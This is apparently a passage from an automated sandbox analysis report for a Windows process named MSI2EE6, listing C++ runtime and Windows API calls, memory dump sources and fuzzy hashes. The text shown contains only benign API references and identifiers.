                                                                          • LocalAlloc.KERNEL32(00000040,00000008,5E20FB0F,00000000,?,00000000,?,?,?,?,00B1C04D,000000FF,?,00ADED1A,?,?), ref: 00ADF964
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADF99A
                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADF9FE
                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADFA6E
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADFB22
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                          • String ID: bad locale name
                                                                          • API String ID: 2968629171-1405518554
                                                                          • Opcode ID: 8926897451cc63696d366a5a9be363e98d264acbb971ff5db61fae7db29fbcc3
                                                                          • Instruction ID: 3e5abc7fe7eadb67921d02b71b2952ad34ba6c23e3ae9e55ff02339c87f06342
                                                                          • Opcode Fuzzy Hash: 8926897451cc63696d366a5a9be363e98d264acbb971ff5db61fae7db29fbcc3
                                                                          • Instruction Fuzzy Hash: 72616CB0D01288EFEB11DFE8C944BDEBBF4AF15314F1441AAE456AB381D7759A04CB61
                                                                          APIs
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00AFAC97
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00AFAC9F
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00AFAD28
                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00AFAD53
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00AFADA8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                          • String ID: csm
                                                                          • API String ID: 1170836740-1018135373
                                                                          • Opcode ID: bb748fa28bc1379e897bcdd4402b782fc0642c98e880409151c1d7f3e5215588
                                                                          • Instruction ID: 76c34470e8e8d2794d3b69f0e12c3d7784aeaa3d4c01d77b2de2bbefbc01cd84
                                                                          • Opcode Fuzzy Hash: bb748fa28bc1379e897bcdd4402b782fc0642c98e880409151c1d7f3e5215588
                                                                          • Instruction Fuzzy Hash: E641C374A0020C9BCF14DFA8C880BEEBBF5EF15314F148555FA196B352C771AA02CB92
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(00000000,?,00B0E473,?,?,?,00000000,?,?,00B0E69D,00000021,FlsSetValue,00B23780,00B23788,?), ref: 00B0E427
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3664257935-537541572
                                                                          • Opcode ID: fde0d525aa87287abc83761a5374f5a7d91e4dd47caab12a03ba467f4529480e
                                                                          • Instruction ID: 2616b35a770172c369c099eb4342c022a877465f9ede61a90f449bf9d390077f
                                                                          • Opcode Fuzzy Hash: fde0d525aa87287abc83761a5374f5a7d91e4dd47caab12a03ba467f4529480e
                                                                          • Instruction Fuzzy Hash: BA21D831A00221A7DB229764AC45A5E7FD8DB45760B2545A0ED35A73D1EE30FE00C6A0
                                                                          APIs
                                                                          • #224.MSI(?,00000001,00000000,00000000,00000000), ref: 00AD2D70
                                                                          • LocalFree.KERNEL32(?), ref: 00AD2DDA
                                                                          • LocalFree.KERNEL32(?), ref: 00AD2E44
                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 00AD2F85
                                                                            • Part of subcall function 00AD3DE0: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000,5E20FB0F), ref: 00AD3E23
                                                                          • LocalFree.KERNEL32(?), ref: 00AD2F3B
                                                                          • CertFreeCertificateContext.CRYPT32(00000003,?), ref: 00AD2FCB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Free$CertLocal$CertificateContext$#224NameString
                                                                          • String ID:
                                                                          • API String ID: 2751787804-0
                                                                          • Opcode ID: f06b11953017e2aa2311b86a13f5d5760b464394e6253d6932aa12c2db04fe29
                                                                          • Instruction ID: e0b4ae8a32d48dcf6aedfc29e11fbd8d1239a4b6470756971c6494d26874eab2
                                                                          • Opcode Fuzzy Hash: f06b11953017e2aa2311b86a13f5d5760b464394e6253d6932aa12c2db04fe29
                                                                          • Instruction Fuzzy Hash: 0991AE70D00249CFDB18CFA8C55879EFBB5FF58304F14865AE416AB391DBB5AA84CB90
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADB83D
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADB860
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB888
                                                                          • std::_Facet_Register.LIBCPMT ref: 00ADB8FD
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB931
                                                                          • LocalFree.KERNEL32 ref: 00ADB9D0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
                                                                          • String ID:
                                                                          • API String ID: 1378673503-0
                                                                          • Opcode ID: e3c00ee9a9771dad75c636a8bb4395e9ae0c839d71cd82233ce3f3d7e44e7a65
                                                                          • Instruction ID: bd5e042d8da000228fd4fb01efb491aaefc4cf02568f1d70876802c7086d287d
                                                                          • Opcode Fuzzy Hash: e3c00ee9a9771dad75c636a8bb4395e9ae0c839d71cd82233ce3f3d7e44e7a65
                                                                          • Instruction Fuzzy Hash: 8851B371800249DFCB11DF59D944BAEFBF8FB14720F25466AE86567390DB746E00CB91
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16
                                                                          • String ID: a/p$am/pm
                                                                          • API String ID: 3509577899-3206640213
                                                                          • Opcode ID: 123a26b4337e75b1259c48f38e3706dccb6f2efca60cd02c8f46c3f27a8c9e1f
                                                                          • Instruction ID: 3c703855fde6df6565ab422bfffca6545be3030814c5eddc440e29ac6a2f076a
                                                                          • Opcode Fuzzy Hash: 123a26b4337e75b1259c48f38e3706dccb6f2efca60cd02c8f46c3f27a8c9e1f
                                                                          • Instruction Fuzzy Hash: B8C1B535E882169BDB158F68C899ABAFFF0FF05700F1481C9E501AB2D1DA31BD42CB61
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00AFCC61,00AFAB8C,00AFA304), ref: 00AFCC78
                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AFCC86
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AFCC9F
                                                                          • SetLastError.KERNEL32(00000000,00AFCC61,00AFAB8C,00AFA304), ref: 00AFCCF1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue___vcrt_
                                                                          • String ID:
                                                                          • API String ID: 3852720340-0
                                                                          • Opcode ID: fc641836a5993629623ce131b7b23c77379be8401cf2a5c5cab88bc4927ed9a4
                                                                          • Instruction ID: 31e10ee23349a526781f7d749b0655089ab4336ed581d46f770ed2e9638cd420
                                                                          • Opcode Fuzzy Hash: fc641836a5993629623ce131b7b23c77379be8401cf2a5c5cab88bc4927ed9a4
                                                                          • Instruction Fuzzy Hash: 4501283210D31D5EE61927FAAF8567B276BEB11BB47308329F724560F4EF118C429155
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Mpunct$GetvalsH_prolog3
                                                                          • String ID: $+xv
                                                                          • API String ID: 2204710431-1686923651
                                                                          • Opcode ID: aca5e6e1e0efbe78b865a8ac77b34eda942b519e19dd8f52f6bf5a22ffeaea93
                                                                          • Instruction ID: 6fe9f0b255507d620a02424d58077ddfeb9a389f8ecc51816729f7715e0b1028
                                                                          • Opcode Fuzzy Hash: aca5e6e1e0efbe78b865a8ac77b34eda942b519e19dd8f52f6bf5a22ffeaea93
                                                                          • Instruction Fuzzy Hash: 7921C7B1904B966FD725DF75C89077BBEF8AB08300F14065AE459C7A41E770D641CBD0
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(5E20FB0F,5E20FB0F,?,?,00000000,00B1B0D1,000000FF), ref: 00AD86BB
                                                                            • Part of subcall function 00AF9618: AcquireSRWLockExclusive.KERNEL32(00B32B64,?,?,?,00AD2656,00B3376C,5E20FB0F,?,?,00B1A2AD,000000FF,?,00AD1A17), ref: 00AF9623
                                                                            • Part of subcall function 00AF9618: ReleaseSRWLockExclusive.KERNEL32(00B32B64,?,?,00AD2656,00B3376C,5E20FB0F,?,?,00B1A2AD,000000FF,?,00AD1A17,?,?,?,5E20FB0F), ref: 00AF965D
                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00AD8680
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00AD8687
                                                                            • Part of subcall function 00AF95C7: AcquireSRWLockExclusive.KERNEL32(00B32B64,?,?,00AD26C7,00B3376C,00B1DD70), ref: 00AF95D1
                                                                            • Part of subcall function 00AF95C7: ReleaseSRWLockExclusive.KERNEL32(00B32B64,?,?,00AD26C7,00B3376C,00B1DD70), ref: 00AF9604
                                                                            • Part of subcall function 00AF95C7: WakeAllConditionVariable.KERNEL32(00B32B60,?,?,00AD26C7,00B3376C,00B1DD70), ref: 00AF960F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ExclusiveLock$AcquireRelease$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                          • String ID: IsWow64Process$kernel32
                                                                          • API String ID: 411948497-3789238822
                                                                          • Opcode ID: fe8e27e70ffab73823284866313d1297f22187e9e7aed0b54469f5be66342d89
                                                                          • Instruction ID: 63f9c7acae13b797a15ce03b2d80a86b3d34f6aefdcf3ee63da525e0ad0fcd1c
                                                                          • Opcode Fuzzy Hash: fe8e27e70ffab73823284866313d1297f22187e9e7aed0b54469f5be66342d89
                                                                          • Instruction Fuzzy Hash: BC216FB1A05605DFCB14DF54DD05B9A77E8FB08B20F10465AE81593790DB79AA00CA50
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5E20FB0F,?,?,00000000,00B1C7A0,000000FF,?,00B09D97,?,?,00B09D6B,?), ref: 00B09E3C
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B09E4E
                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00B1C7A0,000000FF,?,00B09D97,?,?,00B09D6B,?), ref: 00B09E70
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 52d504d93e6402d7333c407573dba008a36d4c8a22cde9657919df83a79abfe7
                                                                          • Instruction ID: e1770aba5760568633ac728a9641c12ad1e73cbc3c17294770f7fa9fcc37369f
                                                                          • Opcode Fuzzy Hash: 52d504d93e6402d7333c407573dba008a36d4c8a22cde9657919df83a79abfe7
                                                                          • Instruction Fuzzy Hash: AC018F31940625BFDB158F50EC05BEEBBF8FB04B54F008565E821A22E0DB749900CA90
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEE6FF
                                                                          • ctype.LIBCPMT ref: 00AEE746
                                                                            • Part of subcall function 00AEE213: __Getctype.LIBCPMT ref: 00AEE222
                                                                            • Part of subcall function 00AEA971: __EH_prolog3.LIBCMT ref: 00AEA978
                                                                            • Part of subcall function 00AEA971: std::_Lockit::_Lockit.LIBCPMT ref: 00AEA982
                                                                            • Part of subcall function 00AEAA9B: __EH_prolog3.LIBCMT ref: 00AEAAA2
                                                                            • Part of subcall function 00AEAA9B: std::_Lockit::_Lockit.LIBCPMT ref: 00AEAAAC
                                                                            • Part of subcall function 00AEAC5A: __EH_prolog3.LIBCMT ref: 00AEAC61
                                                                            • Part of subcall function 00AEAC5A: std::_Lockit::_Lockit.LIBCPMT ref: 00AEAC6B
                                                                            • Part of subcall function 00AEAC5A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEACDC
                                                                            • Part of subcall function 00AEABC5: __EH_prolog3.LIBCMT ref: 00AEABCC
                                                                            • Part of subcall function 00AEABC5: std::_Lockit::_Lockit.LIBCPMT ref: 00AEABD6
                                                                            • Part of subcall function 00AE4A74: __EH_prolog3.LIBCMT ref: 00AE4A7B
                                                                            • Part of subcall function 00AE4A74: std::_Lockit::_Lockit.LIBCPMT ref: 00AE4A85
                                                                            • Part of subcall function 00AE4A74: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE4B2C
                                                                          • numpunct.LIBCPMT ref: 00AEEAF4
                                                                            • Part of subcall function 00AEB337: __EH_prolog3.LIBCMT ref: 00AEB33E
                                                                            • Part of subcall function 00AEB06D: __EH_prolog3.LIBCMT ref: 00AEB074
                                                                            • Part of subcall function 00AEB06D: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB07E
                                                                            • Part of subcall function 00AEB06D: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB0EF
                                                                            • Part of subcall function 00AEB197: __EH_prolog3.LIBCMT ref: 00AEB19E
                                                                            • Part of subcall function 00AEB197: std::_Lockit::_Lockit.LIBCPMT ref: 00AEB1A8
                                                                            • Part of subcall function 00AEB197: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB219
                                                                            • Part of subcall function 00AE4A74: Concurrency::cancel_current_task.LIBCPMT ref: 00AE4B37
                                                                            • Part of subcall function 00AEA55E: __EH_prolog3.LIBCMT ref: 00AEA565
                                                                            • Part of subcall function 00AEA55E: std::_Lockit::_Lockit.LIBCPMT ref: 00AEA56F
                                                                            • Part of subcall function 00AEA55E: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEA5E0
                                                                          • __Getcoll.LIBCPMT ref: 00AEE8BA
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                            • Part of subcall function 00AD8700: LocalAlloc.KERNEL32(00000040,00000000,00AFA0E5,00000000,5E20FB0F,?,00000000,?,00000000,?,00B1DC68,000000FF,?,00AD17B5,00000000,00B1EDDA), ref: 00AD8706
                                                                          • codecvt.LIBCPMT ref: 00AEEBA5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$H_prolog3$Lockit::_$Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtctypenumpunct
                                                                          • String ID:
                                                                          • API String ID: 332695549-0
                                                                          • Opcode ID: 08b1c5d67f0ae68f01463e6325d304c584529b45f4a8760d759ada181802f885
                                                                          • Instruction ID: c27cde9d835e90ad2ead660d9fa6310ae76fbd9a7ab361682f775b24ac674640
                                                                          • Opcode Fuzzy Hash: 08b1c5d67f0ae68f01463e6325d304c584529b45f4a8760d759ada181802f885
                                                                          • Instruction Fuzzy Hash: 68E10371800296AFDB21EF668D46A7F7AF5FF41360F20812DF9596B392EB308D009791
                                                                          APIs
                                                                          • __alloca_probe_16.LIBCMT ref: 00B0DE03
                                                                          • __alloca_probe_16.LIBCMT ref: 00B0DEC4
                                                                          • __freea.LIBCMT ref: 00B0DF2B
                                                                            • Part of subcall function 00B0CB0A: HeapAlloc.KERNEL32(00000000,?,?,?,00B0C47A,?,00000000,?,00AFE012,?,?,?,?,?,?,00AD164E), ref: 00B0CB3C
                                                                          • __freea.LIBCMT ref: 00B0DF40
                                                                          • __freea.LIBCMT ref: 00B0DF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 1096550386-0
                                                                          • Opcode ID: b47778e8d7a5ba8b958d4da5af777bb3bc9d80eaddd8569af84c0c7d1049ecb3
                                                                          • Instruction ID: 1f6bbfc49fdbfe3446701bdcb42137f4c825b3d97d4d5f4a9c8b301fc50faffd
                                                                          • Opcode Fuzzy Hash: b47778e8d7a5ba8b958d4da5af777bb3bc9d80eaddd8569af84c0c7d1049ecb3
                                                                          • Instruction Fuzzy Hash: 9A519F72A10206AFEF249FA4CC81EFB7EE9EF54350B1545A9FD09DA1D1EA31CC508760
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC90D
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC930
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC958
                                                                          • std::_Facet_Register.LIBCPMT ref: 00ADC9CD
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADCA01
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                          • String ID:
                                                                          • API String ID: 459529453-0
                                                                          • Opcode ID: 042b6b3bd113e838198cfd3a678a2ac2f54bc0a9a16d07f99f3e1845aa98eac5
                                                                          • Instruction ID: 468a611fc90b79f784f79bf542093675566ffe656ecb44682616b67fa8de9b91
                                                                          • Opcode Fuzzy Hash: 042b6b3bd113e838198cfd3a678a2ac2f54bc0a9a16d07f99f3e1845aa98eac5
                                                                          • Instruction Fuzzy Hash: CA41BF7180024ADFCB05DF59D954BAEFBB4FF54320F24425AE865A7391DB30AE05CBA1
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADF2ED
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADF310
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADF338
                                                                          • std::_Facet_Register.LIBCPMT ref: 00ADF3AD
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADF3E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                          • String ID:
                                                                          • API String ID: 459529453-0
                                                                          • Opcode ID: 044c7199f219f056c5a9d15a67438bcd286af42d289221e85a1bb35f990b5ab6
                                                                          • Instruction ID: 5919303b8dae5f603c4f4228f981eae6678729a81a82dad141ed6f6c43651430
                                                                          • Opcode Fuzzy Hash: 044c7199f219f056c5a9d15a67438bcd286af42d289221e85a1bb35f990b5ab6
                                                                          • Instruction Fuzzy Hash: D541BE71800249DFCB01DF58D940BAEFBB4FF54320F25466AD822AB391DB34AE41CB91
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB2D
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB50
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEB78
                                                                          • std::_Facet_Register.LIBCPMT ref: 00ADEBED
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEC21
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
